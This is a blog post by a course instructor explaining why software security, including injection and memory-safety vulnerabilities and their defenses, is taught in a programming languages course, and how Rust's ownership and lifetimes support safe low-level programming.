Software Security Is a Programming Languages Issue

This is the the last of three posts on the course I regularly teach, CS 330, Organization of Programming Languages. The first two posts covered programming language styles and mathematical concepts. This post covers the last 1/4 of the course, which focuses on software security, and related to that, the programming language Rust.

This course topic might strike you as odd: Why teach security in a programming languages course? Doesn’t it belong in, well, a security course? I believe that if we are to solve our security problems, then we must build software with security in mind right from the start. To do that, all programmers need to know something about security, not just a handful of specialists. Security vulnerabilities are both enabled and prevented by various language (mis)features, and programming (anti)patterns. As such, it makes sense to introduce these concepts in a programming (languages) course, especially one that all students must take.

This post is broken into three parts: the need for security-minded programming, how we cover this topic in 330, and our presentation of Rust. The post came to be a bit longer than I’d anticipated; apologies!

Software source code

Security is a programming (languages) concern

The Status Quo: Too Much Post-hoc Security

There is a lot of interest these days in securing computer systems. This interest follows from the highly publicized roll call of serious data breaches, denial of service attacks, and system hijacks. In response, security companies are proliferating, selling computerized forms of spies, firewalls, and guard towers. There is also a regular call for more “cybersecurity professionals” to help man the digital walls.

It might be that these efforts are worth their collective cost, but call me skeptical. I believe that a disproportionate portion of our efforts focuses on adding security to a system after it has been built. Is your server vulnerable to attack? If so, no problem: Prop an intrusion detection system in front of it to identify and neuter network packets attempting to exploit the vulnerability. There’s no doubt that such an approach is appealing; too bad it doesn’t actually work. As computer security experts have been saying since at least the 60s, if you want a system to actually be secure then it must be designed and built with security in mind. Waiting until the system is deployed is too late.

Building Security In

There is a mounting body of work that supports building secure systems from the outset. For example, the Building Security In Maturity Model (BSIMM) catalogues the processes followed by a growing list of companies to build more secure systems. Companies such as Synopsys and Veracode offer code analysis products that look for security flaws. Processes such as Microsoft’s Security Development Lifecycle and books such as Gary McGraw‘s Software Security: Building Security In, and Sami Saydjari‘s recently released Engineering Trustworthy Systems identify a path toward better designed and built systems.

These are good efforts. Nevertheless, we need even more emphasis on the “build security in” mentality so we can rely far less on necessary, but imperfect, post-hoc stuff. For this shift to happen, we need better education.

Security in a Programming Class

Running off of a cliff

Choosing performance over security

Programming courses typically focus on how to use particular languages to solve problems efficiently. Functionality is obviously paramount, with performance an important secondary concern.

But in today’s climate shouldn’t security be at the same level of importance as performance? If you argue that security is not important for every application, I would say the same is true of performance. Indeed the rise of slow, easy-to-use scripting languages is a testament to that. But sometimes performance is very important, or becomes so later, and the same is true of security. Indeed, many security bugs arise because code originally written for a benign setting ends up in a security-sensitive one. As such, I believe educators should regularly talk about how to make code more secure just as we regularly talk about how to make it more efficient.

To do this requires a change in mindset. A reasonable approach, when focusing on correctness and efficiency, is to aim for code that works under expected conditions. But expected use is not good enough for security: Code must be secure under all operating conditions.

Normal users are not going to input weirdly formatted files to to PDF viewers. But adversaries will. As such, students need to understand how a bug in a program can be turned into a security vulnerability, and how to stop it from happening. Our two lectures in CS 330 on security shift between illustrating a kind of security vulnerability, identifying the conditions that make that vulnerability possible, and developing a defense that eliminates those conditions. For the latter we focus on language properties (e.g., type safety) and programming patterns (e.g., validating input).

Security Bugs

In our first lecture, we start by introducing the high-level idea of a buffer overflow vulnerability, in which an input is larger than the buffer designed to hold it. We hint at how to exploit it by smashing the stack. A key feature of this attack is that while the program intends for an input to be treated as data, the attacker is able to trick the program to treat it as code which does something harmful. We also look at command injection, and see how it similarly manifests when an attacker tricks the program to treat data as code.

SQL injection analogy to Scrabble

SQL injection: malicious code from benign parts

Our second lecture covers vulnerabilities and attacks specific to web applications, including SQL injection, Cross-site Request Forgery (CSRF), and Cross-site scripting (XSS). Once again, these vulnerabilities all have the attribute that untrusted data provided by an attacker can be cleverly crafted to trick a vulnerable application to treat that data as code. This code can be used to hijack the program, steal secrets, or corrupt important information.

Coding Defenses

It turns out the defense against many of these vulnerabilities is the same, at a high level: validate any untrusted input before using it, to make sure it’s benign. We should make sure an input is not larger than the buffer allocated to hold it, so the buffer is not overrun. In any language other than C or C++, this check happens automatically (and is generally needed to ensure type safety).

For the other four attacks, the vulnerable application uses the attacker input when piecing together another program. For example, an application might expect user inputs to correspond to a username and password, splicing these inputs into a template SQL program with which it queries a database. But the inputs could contain SQL commands that cause the query to do something different than intended. The same is true when constructing shell commands (command injection), or Javascript and HTML programs (cross-site scripting). The defense is also the same, at a high level: user inputs need to either have potentially dangerous content removed or made inert by construction (e.g., through the use of prepared statements).

None of this stuff is new, of course. Most security courses talk about these topics. What is unusual is that we are talking about them in a “normal” programming languages course.

Our security project reflects the defensive-minded orientation of the material. While security courses tend to focus on vulnerability exploitation, CS 330 focuses on fixing the bugs that make an application vulnerable. We do this by giving the students a web application, written in Ruby, with several vulnerabilities in it. Students must fix the vulnerabilities without breaking the core functionality. We test the fixes automatically by having our auto-grading system test functionality and exploitability. Several hidden tests exploit the initially present vulnerabilities. The students must modify the application so these cases pass (meaning the vulnerability has been removed and/or can no longer be exploited) without causing any of the functionality-based test cases to fail.

Low-level Control, Safely

The most dangerous kind of vulnerability allows an attacker to gain arbitrary code execution (ACE): Through exploitation, the attacker is able to execute code of their choice on the target system. Memory management errors in type-unsafe languages (C and C++) comprise a large class of ACE vulnerabilities. Use-after-free errors, double-frees, and buffer overflows are all examples. The latter is still the single largest category of vulnerability today, according to MITRE’s Common Weakness Enumeration (CWE) database.

Programs written in type-safe languages, such as Java or Ruby, 1 are immune to these sorts of memory errors. Writing applications in these languages would thus eliminate a large category of vulnerabilities straightaway. 2 The problem is that type-safe languages’ use of abstract data representations and garbage collection (GC), which make programming easier, remove low-level control and add overhead that is sometimes hard to bear. C and C++ are essentially the only game in town 3 for operating systems, device drivers, and embedded devices (e.g., IoT), which cannot tolerate the overhead and/or lack of control. And we see that these systems are regularly and increasingly under attack. What are we to do?

Rust: Type safety without GC

In 2010, the Mozilla corporation (which brings you Firefox) officially began an ambitious project to develop a safe language suitable for writing high-performance programs. The result is Rust. 4 In Rust, type-safety ensures (with various caveats) that a program is free of memory errors and free of data races. In Rust, type safety is possible without garbage collection, which is not true of any other mainstream language.

Rust language logo

Rust, the programming language

In CS 330, we introduce Rust and its basic constructs, showing how Rust is arguably closer to a functional programming language than it is to C/C++. (Rust’s use of curly braces and semi-colons might make it seem familiar to C/C++ programmers, but there’s a whole lot more that’s different than is the same!)

We spend much of our time talking about Rust’s use of ownership and lifetimes. Ownership (aka linear typing) is used to carefully track pointer aliasing, so that memory modified via one alias cannot mistakenly corrupt an invariant assumed by another. Lifetimes track the scope in which pointed-to memory is live, so that it is freed automatically, but no sooner than is safe. These features support managing memory without GC. They also support sophisticated programming patterns via smart pointers and traits (a construct I was unfamiliar with, but now really like). We provide a simple programming project to familiarize students with the basic and advanced features of Rust.

Assessment

I enjoyed learning Rust in preparation for teaching it. I had been wanting to learn it since my interview with Aaron Turon some years back. The Rust documentation is first-rate, so that really helped.

I also enjoyed seeing connections to my own prior research on the Cyclone programming language. (I recently reflected on Cyclone, and briefly connected it to Rust, in a talk at the ISSISP’18 summer school.) Rust’s ownership relates to Cyclone’s unique/affine pointers, and Rust’s lifetimes relate to Cyclone’s regions. Rust’s smart pointers match patterns we also implemented in Cyclone, e.g., for reference counted pointers. Rust has taken these ideas much further, e.g., a really cool integration with traits handles tricky aspects of polymorphism. The Rust compiler’s error messages are also really impressive!

A big challenge in Cyclone was finding a way to program with unique pointers without tearing your hair out. My impression is that Rust programmers face the same challenge (as long as you don’t resort to frequent use of unsafe blocks). Nevertheless, Rust is a much-loved programming language, so the language designers are clearly doing something right! Oftentimes facility is a matter of comfort, and comfort is a matter of education and experience. As such, I think Rust fits into the philosophy of CS 330, which aims to introduce new language concepts that are interesting in and of themselves, and may yet have expanded future relevance.

Conclusions

We must build software with security in mind from the start. Educating all future programmers about security is an important step toward increasing the security mindset. In CS 330 we illustrate common vulnerability classes and how they can be defended against by the language (e.g., by using those languages, like Rust, that are type safe) and programming patterns (e.g., by validating untrusted input). By doing so, we are hopefully making our students more fully cognizant of the task that awaits them in their future software development jobs. We might also interest them to learn more about security in a subsequent security class.

In writing this post, I realize we could do more to illustrate how type abstraction can help with security. For example, abstract types can be used to increase assurance that input data is properly validated, as explained by Google’s Christoph Kern in his 2017 SecDev Keynote. This fact is also a consequence of semantic type safety, as argued well by Derek Dreyer in his POPL’18 Keynote. Good stuff to do for Spring’19 !



from Hacker News https://ift.tt/2MENOSn